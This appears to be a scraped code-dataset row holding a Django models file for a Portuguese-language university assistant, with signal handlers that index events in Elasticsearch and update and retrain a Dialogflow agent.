print("Valor a pagar para cercar o terreno(R$): {:.2f}".format(valor))
|
983,799 | c9bd509c9dfafcb29209cdbaad184bef5a748bac | from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# custom imports
import datetime
from elasticsearch import Elasticsearch
from doug_server.ElasticConfig import ElasticConfig
import spacy
from spacy import displacy
from collections import Counter
import pt_core_news_sm
import dialogflow_v2
# os imports
import os
# Create your models here.
class Entidade(models.Model):
nome = models.CharField(max_length=30, blank= True, null= True)
class Meta:
abstract = True
class Pessoa(Entidade):
email = models.EmailField()
nome = models.CharField(max_length= 30)
class Meta:
abstract = True
unique_together: ['email']
class Setor(Entidade):
email = models.EmailField()
class Meta():
abstract = True
unique_together: ['email']
class Documento(models.Model):
titulo = models.CharField(max_length= 500, blank= True, null= True)
data_upload = models.DateField()
disponivel_em = models.URLField()
user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
class Meta():
abstract = True
class Curso(Entidade):
pass
class Secretaria(Setor):
telefone = PhoneNumberField()
curso = models.OneToOneField(to=Curso, on_delete=None, related_name= 'secretaria', null=True)
class Secretario(Pessoa):
secretaria = models.ForeignKey(to=Secretaria, on_delete=None, related_name='secretario', null=True )
class Departamento(Setor):
contato = PhoneNumberField()
curso = models.ForeignKey(to= Curso, on_delete=None, related_name="departamento", null=True)
class Professor(Pessoa):
lattes = models.URLField()
departamento = models.ForeignKey(Departamento, related_name='corpo_docente', on_delete=models.CASCADE, null= True)
is_chefe_departamento = models.OneToOneField(Departamento,related_name='chefe_departamento', on_delete=None, null= True)
def __unicode__(self):
return '%s: %s' % (self.nome, self.email)
class Disciplinas(Entidade):
carga_horaria = models.IntegerField()
dia_da_semana = models.CharField(max_length= 300)
semestre = models.IntegerField(choices=[(1,2)])
ano = models.IntegerField()
professor_id = models.OneToOneField(Professor,on_delete=None)
class Tutores(Pessoa):
telefone = PhoneNumberField(null=True)
disciplina = models.OneToOneField(to=Disciplinas,on_delete=models.SET_NULL, null=True)
class Edital(Documento):
path = models.URLField()
informacao_adicional = models.CharField(max_length=200)
class Boletim(models.Model):
data = models.DateField()
numero = models.IntegerField(null= True, blank= True)
class Noticia(Documento):
corpo = models.TextField()
boletim_fk = models.ForeignKey(on_delete= models.SET_NULL, to= Boletim, null= True)
class Evento(models.Model):
assunto = models.TextField()
data_criado = models.DateTimeField(editable= False)
data_evento = models.DateTimeField()
periodo = models.CharField(max_length= 7, null= True, blank= True)
def save(self, *args, **kwargs):
self.data_criado = datetime.datetime.now()
# extração do periodo da data fornecida
data_evento = self.data_evento
periodo = ''
if(data_evento.month < 8):
periodo = '01/'
else:
periodo = '02/'
periodo += str(data_evento.year)
self.periodo = periodo
object = super(Evento, self).save(*args, **kwargs)
'''
@receivers
'''
# Indexa o novo evento no momento em que um evento é criado no Banco de Dados
@receiver(post_save, sender=Evento, dispatch_uid="evento criado")
def insertEventoElasticSearch(sender, instance, created, **kwargs):
es_config = ElasticConfig()
es = Elasticsearch(hosts=es_config.hosts)
newInstance = {
'assunto': instance.assunto,
'data_criado': instance.data_criado,
'data_evento': instance.data_evento,
'periodo': instance.periodo
}
res = es.index(index=es_config.getEventoIndex(), doc_type='evento', id= instance.id, body= newInstance)
print(res)
@receiver(post_save, sender= Evento)
def updateEventoKeyWordEntities(sender, instance, created, **kwargs):
assunto = instance.assunto
# instancia o modelo de nlp
nlp = pt_core_news_sm.load()
doc = nlp(assunto)
# Separação de tokens
tokens = pre_processing(doc)
# Requisição do dialogflow para obter as entities
client = dialogflow_v2.EntityTypesClient()
parent = client.project_agent_path(os.environ['PROJECT_ID'])
list_entity_types_response = list(client.list_entity_types(parent))
# cria uma nova instância com as novas entities processadas
list_entity_types_response = list(client.list_entity_types(parent))
entity_type = list_entity_types_response[2]
entries = []
entities = list(entity_type.entities)
for token in tokens:
entities.append({'value': token.lemma_, 'synonyms': [token.text]})
#realiza o submit das entities ao dialogflow
response = client.batch_update_entities(entity_type.name, entities)
response.done()
# treina o modelo do
client = dialogflow_v2.AgentsClient()
project_parent = client.project_path(os.environ['PROJECT_ID'])
client.train_agent(project_parent)
def pre_processing(doc):
tokens = [token for token in doc if not token.is_stop]
return tokens
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.